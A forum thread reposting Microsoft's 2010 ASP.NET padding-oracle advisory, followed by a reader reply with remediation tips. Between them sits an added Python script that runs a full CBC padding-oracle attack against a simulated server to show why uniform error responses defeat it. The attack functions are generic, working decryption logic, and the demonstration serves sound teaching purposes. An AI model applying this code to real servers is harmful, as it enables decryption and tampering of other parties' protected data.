Microsoft Security Advisory (2416728): Vulnerability in ASP.NET Could Allow Information Disclosure -

Posted by News (Extraordinary Robot, joined Jun 27, 2006)
Revision Note: V1.1 (September 20, 2010): Revised Executive Summary to communicate that Microsoft is aware of limited, active attacks. Also added additional entries to the Frequently Asked Questions section and additional clarification to the workaround.

Advisory Summary: Microsoft is investigating a new public report of a vulnerability in ASP.NET. An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the target server, such as web.config. This would allow the attacker to tamper with the contents of the data. By sending back the altered contents to an affected server, the attacker could observe the error codes returned by the server. Microsoft is aware of limited, active attacks at this time.
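The mechanism the advisory describes (alter encrypted data, send it back, watch which error the server returns) is a CBC padding-oracle attack. The script below is an added example, not part of the original post or of Microsoft's advisory, that runs the attack end to end against a simulated server. Everything in it is constructed: the block cipher is a toy SHA-256 Feistel construction standing in for AES (the attack only depends on the CBC chaining, not on the cipher), the "secret" is a made-up JSON string rather than real ViewState, and the status codes 500 (padding failure) and 400 (any other failure) are hypothetical.

```python
# Added example: CBC padding-oracle attack against a simulated leaky server.
# Toy Feistel block cipher over SHA-256 so it runs with the standard library only.
import hashlib
import os

BLOCK = 16
PADDING_ERROR = 500  # hypothetical status a leaky server returns on bad padding
OTHER_ERROR = 400    # hypothetical status for any other failure


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[: BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 4-round Feistel cipher; an assumption standing in for AES."""
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _round(key, rnd, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _round(key, rnd, l)), l
    return l + r


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    padded, out, prev = pkcs7_pad(plaintext), b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, blk), prev)
        prev = blk
    return pkcs7_unpad(out)


class Server:
    """Stand-in for the affected endpoint. With distinguishable_errors=True a padding
    failure and any other failure return different codes: that difference is the oracle."""

    def __init__(self, key: bytes, expected: bytes, distinguishable_errors: bool):
        self.key, self.expected = key, expected
        self.distinguishable_errors = distinguishable_errors

    def handle(self, iv: bytes, ciphertext: bytes) -> int:
        try:
            plaintext = cbc_decrypt(self.key, iv, ciphertext)
        except ValueError:
            return PADDING_ERROR if self.distinguishable_errors else OTHER_ERROR
        return 200 if plaintext == self.expected else OTHER_ERROR


def recover_block(padding_ok, prev: bytes, target: bytes) -> bytes:
    """Learn D(target) byte by byte by forging the preceding block until the
    decrypted padding is valid, then XOR with the real preceding block."""
    inter = bytearray(BLOCK)  # D(target): cipher output before the CBC XOR
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        for guess in range(256):
            forged = bytearray(BLOCK)
            forged[pos] = guess
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ padval
            if not padding_ok(bytes(forged), target):
                continue
            if pos == BLOCK - 1:
                # Edge case: "valid" may come from a longer padding such as \x02\x02.
                # Flipping the byte before it breaks that case but not a real \x01.
                forged[pos - 1] ^= 0x01
                if not padding_ok(bytes(forged), target):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise ValueError("oracle accepted no guess for this position")
    return _xor(bytes(inter), prev)


def padding_oracle_decrypt(padding_ok, iv: bytes, ciphertext: bytes) -> bytes:
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(recover_block(padding_ok, blocks[i - 1], blocks[i])
                     for i in range(1, len(blocks)))
    return pkcs7_unpad(plain)


def run_attack(distinguishable_errors: bool) -> bool:
    """Encrypt a constructed secret, then try to recover it from the server's
    responses alone. Returns True if the attacker obtains the plaintext."""
    key, iv = os.urandom(16), os.urandom(16)
    secret = b'{"user":"alice","role":"user"}'  # constructed sample, not real ViewState
    server = Server(key, secret, distinguishable_errors)
    ciphertext = cbc_encrypt(key, iv, secret)

    def padding_ok(forged_iv: bytes, block: bytes) -> bool:
        return server.handle(forged_iv, block) != PADDING_ERROR

    try:
        return padding_oracle_decrypt(padding_ok, iv, ciphertext) == secret
    except ValueError:
        return False


if __name__ == "__main__":
    print("leaky server, plaintext recovered:", run_attack(True))
    print("uniform errors, plaintext recovered:", run_attack(False))
```

The attacker never sees the key: each byte of plaintext is recovered purely from whether the server's reply was the padding-failure code or something else. run_attack(True) recovers the secret; run_attack(False), where a padding failure and any other failure return the same code, leaves the attacker with garbage, which is the property any workaround based on uniform error responses relies on.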


Microsoft Security Advisory (2416728) - ASP.NET Vulnerability Details
Hello News,
This advisory notes an important vulnerability in ASP.NET where an attacker could potentially use the application’s View State or even read critical files like web.config. A few key points:
Nature of the Vulnerability:
An attacker can potentially view or alter encrypted data such as the View State or access file contents on the server. This is possible by observing error codes returned after the tampered data is sent back to the server.
Active Attacks Reported:
Microsoft has confirmed limited, active attacks. Even if your environment does not appear to be targeted, it’s wise to assess your server configurations and remediation strategies.
Practical Considerations:
  • Ensure that your ASP.NET applications are using up-to-date encryption practices for View States.
  • Review web.config and other sensitive configuration files to verify they aren’t inadvertently exposing critical data.
  • Follow any recommended workarounds as highlighted in the advisory FAQ until a complete patch is available.
The revision note (V1.1, September 20, 2010) stresses clearer communication regarding the risk and mitigation steps. If you are running ASP.NET applications, an immediate review of your security measures is suggested.
Feel free to discuss further if there’s any aspect of this advisory you’d like more details on.
Stay secure!
TechSalute
 
